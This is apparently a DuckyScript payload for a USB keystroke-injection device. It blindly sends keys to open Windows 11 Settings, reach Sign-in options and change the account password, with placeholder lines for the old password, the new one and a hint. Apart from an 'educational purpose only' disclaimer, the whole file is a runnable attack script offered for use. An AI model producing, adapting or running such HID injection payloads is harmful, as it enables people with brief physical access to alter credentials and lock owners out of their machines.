REM author: Paren76 on github.com
REM This script will change the lockscreen password or your Windows 11 PC
REM ***************
REM This is for educational purpose only. Do not use this to harm anyone.
REM *************** 
REM
DELAY 2500
REM close explorer
ALT F4
REM navigate to settings
GUI
TAB
RIGHTARROW
RIGHTARROW
RIGHTARROW
RIGHTARROW
ENTER
REM navigate to account
TAB 
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
ENTER
REM navigate to login option
TAB
TAB
TAB
TAB
DOWNARROW
DOWNARROW
DOWNARROW
ENTER
REM navigate to password
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
TAB
ENTER
DELAY 5000
TAB 
ENTER
REM change the password
REM string old password (just remove the rem in this line and add the old password)
ENTER
REM string new password
DOWNARROW
REM repeat new password
DOWNARROW
REM enter a hint 
ENTER
DELAY 2500
ENTER
ALT F4
REM Finished
